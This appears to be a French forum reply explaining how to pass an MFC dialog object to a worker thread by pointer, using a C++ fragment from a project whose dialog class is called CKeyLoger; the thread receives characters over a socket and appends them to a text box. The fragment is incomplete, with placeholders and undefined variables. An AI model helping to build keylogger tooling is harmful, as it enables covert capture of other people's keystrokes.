Ok je t'explique :
imagine que nous sommes dans le fonction qui appelle la boite de dialogue et qui lance le thread.
.....
CKeyLoger k; /? ou le nom que tu as mis
k.Create( xxxxx, xxxx );
CreateThread( NULL,
0,
recpt,
(void*)&k,
xxx,
&yyy
);
....
void recpt(void* pDialog)
{
CString letters;
CKeyLoger* pKeyLoger; //Classe de la boîte de dialogue
char ltr[5];
pKeyLoger = (CKeyLoger*) pDialog; // Recuperation d'un pointeur
do
{
strcpy(ltr,"" );
pKeyLoger->m_key.GetWindowText(letters); //C la que ça plante
recv(c,ltr,sizeof(ltr),0);
letters += ltr;
pKeyLoger->m_key.SetWindowText(letters); //C la que ça plante
Sleep(100);
}
while(stop == false);
_endthread();
}
mettre un & devant le nom d'une variable c'est travailler avec son adresse donc avec qqchose qui est le contenu d'un pionteur. bref.